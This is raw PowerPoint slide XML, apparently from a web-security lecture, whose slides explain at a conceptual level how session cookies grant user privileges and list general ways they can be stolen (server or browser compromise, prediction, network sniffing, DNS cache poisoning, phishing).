              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{079CE107-3FCF-2240-B60C-76242CFE7FF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="350043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2470" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3C487FE-04D9-FF4C-A48A-7FF99550D49A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447800" y="3448050"/>
            <a:ext cx="75136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700">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Holding a session cookie gives access to a site  with privileges of the referenced user</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EFD3F4D-E8B5-D540-818A-B1E7A0AA050D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763588" y="4757738"/>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A8DC6D00-0C14-054D-A301-2855C5457447}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1104900" y="4705350"/>
            <a:ext cx="7593013" cy="863600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2700" spc="-15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Thus, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="30" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>stealing </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="40" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="20" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>may </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>allow an </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="30" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="-30" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:endParaRPr sz="2700" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2700" b="1" spc="15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>impersonate a legitimate</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" b="1" spc="-75" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" b="1" spc="15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:endParaRPr sz="2700" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E39979D0-39B5-C047-81D0-3F96DB9280D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="5749925"/>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82D8FE24-EABB-DC4A-ACCC-4A68E0F6787B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="631983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2475" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DFD1FF2-8E1B-5B40-AE71-77C32792F4BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447800" y="5543550"/>
            <a:ext cx="720566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6000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2700">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Actions will seem to be from that user  Permitting theft or corruption of sensitive data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62476" name="object 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67268BB5-0F70-9F47-A4B4-ED49CE316280}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6731000" y="368300"/>
            <a:ext cx="2794000" cy="2794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3" name="object 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04D5E5E3-F37B-3249-A31B-5EAD4C91B300}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9660412" y="379802"/>
            <a:ext cx="141064" cy="4725670"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="vert270" lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="1145"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://images-mediawiki-sites.thefullwiki.org/09/9/8/1/0429334029464255.jpg</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62478" name="object 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C3303CA-5070-6B46-9DB1-33B637AC67F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9790113" y="387350"/>
            <a:ext cx="0" cy="4699000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 4671073 h 4700270"/>
              <a:gd name="T1" fmla="*/ 0 h 4700270"/>
              <a:gd name="T2" fmla="*/ 0 60000 65536"/>
              <a:gd name="T3" fmla="*/ 0 60000 65536"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T2">
                <a:pos x="0" y="T0"/>
              </a:cxn>
              <a:cxn ang="T3">
                <a:pos x="0" y="T1"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path h="4700270">
                <a:moveTo>
                  <a:pt x="0" y="4700197"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="6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EC9FA66-24C4-5A4E-A22B-18130027DC63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="812800"/>
            <a:ext cx="8515350" cy="892175"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="57050" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="15847" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="5300" spc="10" dirty="0"/>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5300" spc="15" dirty="0"/>
              <a:t>you want </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5300" spc="10" dirty="0"/>
              <a:t>to steal </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5300" spc="15" dirty="0"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5300" spc="-55" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5300" spc="65" dirty="0"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:endParaRPr sz="5300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FC5C407-5F2F-F74E-8DB6-33D7433DA3E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763588" y="2211388"/>
            <a:ext cx="149225" cy="1263650"/>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a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="1190"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="285" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>•</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="1190"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="285" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>•</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63492" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DED5A910-3AE3-7945-B456-E9D9A3CD88AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1079500" y="2103438"/>
            <a:ext cx="75438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16000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2500" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Compromise </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2500">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>the server or user’s machine/browser  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2500" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Predict </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2500">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>it based on other information you know  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="116000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2500" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sniff </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2500">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>the network</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BFF4A29-1EAE-8C42-9513-5FB74A0564AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="3556000"/>
            <a:ext cx="149225" cy="317500"/>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47F120FA-4665-E54A-954D-103623094D0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1422400" y="3511550"/>
            <a:ext cx="6521450" cy="404813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" spc="-85" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>vs. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>HTTPS </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>/ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="45" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>mixed</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="175" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="35" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>content</a:t>
            </a:r>
            <a:endParaRPr sz="2600" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F356168-F8ED-0E45-A247-4CCB1B44D0B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763588" y="4005263"/>
            <a:ext cx="149225" cy="317500"/>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24E436F4-6A36-4243-9D6E-0837B7783471}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1079500" y="3968750"/>
            <a:ext cx="5397500" cy="404813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" b="1" spc="25" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" b="1" spc="20" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>cache</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" b="1" spc="-65" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" b="1" spc="15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>poisoning</a:t>
            </a:r>
            <a:endParaRPr sz="2600" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF6796CD-3500-E74F-A25C-ECAD782DD6BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="4452938"/>
            <a:ext cx="149225" cy="790575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="285" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>•</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="1190"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="285" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>•</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63498" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F04B8E12-2482-8F4E-A877-0EC33A0941B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1231900" y="4357688"/>
            <a:ext cx="67786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032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14000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2500">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Trick the user into thinking you are Facebook  The user will send you the cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="888"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600" b="1">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Network-based attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2600">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63499" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A165758-F195-784D-A271-CBF2FA4C9FA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="563563" y="2971800"/>
            <a:ext cx="8678862" cy="2181225"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 8678545"/>
              <a:gd name="T1" fmla="*/ 1831241 h 2179954"/>
              <a:gd name="T2" fmla="*/ 0 w 8678545"/>
              <a:gd name="T3" fmla="*/ 377573 h 2179954"/>
              <a:gd name="T4" fmla="*/ 2902 w 8678545"/>
              <a:gd name="T5" fmla="*/ 330212 h 2179954"/>
              <a:gd name="T6" fmla="*/ 11377 w 8678545"/>
              <a:gd name="T7" fmla="*/ 284605 h 2179954"/>
              <a:gd name="T8" fmla="*/ 25099 w 8678545"/>
              <a:gd name="T9" fmla="*/ 241107 h 2179954"/>
              <a:gd name="T10" fmla="*/ 43695 w 8678545"/>
              <a:gd name="T11" fmla="*/ 200074 h 2179954"/>
              <a:gd name="T12" fmla="*/ 66793 w 8678545"/>
              <a:gd name="T13" fmla="*/ 161856 h 2179954"/>
              <a:gd name="T14" fmla="*/ 94091 w 8678545"/>
              <a:gd name="T15" fmla="*/ 126812 h 2179954"/>
              <a:gd name="T16" fmla="*/ 125238 w 8678545"/>
              <a:gd name="T17" fmla="*/ 95288 h 2179954"/>
              <a:gd name="T18" fmla="*/ 159840 w 8678545"/>
              <a:gd name="T19" fmla="*/ 67644 h 2179954"/>
              <a:gd name="T20" fmla="*/ 197571 w 8678545"/>
              <a:gd name="T21" fmla="*/ 44243 h 2179954"/>
              <a:gd name="T22" fmla="*/ 238104 w 8678545"/>
              <a:gd name="T23" fmla="*/ 25421 h 2179954"/>
              <a:gd name="T24" fmla="*/ 281045 w 8678545"/>
              <a:gd name="T25" fmla="*/ 11538 h 2179954"/>
              <a:gd name="T26" fmla="*/ 326091 w 8678545"/>
              <a:gd name="T27" fmla="*/ 2948 h 2179954"/>
              <a:gd name="T28" fmla="*/ 372868 w 8678545"/>
              <a:gd name="T29" fmla="*/ 0 h 2179954"/>
              <a:gd name="T30" fmla="*/ 8312936 w 8678545"/>
              <a:gd name="T31" fmla="*/ 0 h 2179954"/>
              <a:gd name="T32" fmla="*/ 8359701 w 8678545"/>
              <a:gd name="T33" fmla="*/ 2948 h 2179954"/>
              <a:gd name="T34" fmla="*/ 8404747 w 8678545"/>
              <a:gd name="T35" fmla="*/ 11538 h 2179954"/>
              <a:gd name="T36" fmla="*/ 8447695 w 8678545"/>
              <a:gd name="T37" fmla="*/ 25421 h 2179954"/>
              <a:gd name="T38" fmla="*/ 8488223 w 8678545"/>
              <a:gd name="T39" fmla="*/ 44243 h 2179954"/>
              <a:gd name="T40" fmla="*/ 8525954 w 8678545"/>
              <a:gd name="T41" fmla="*/ 67644 h 2179954"/>
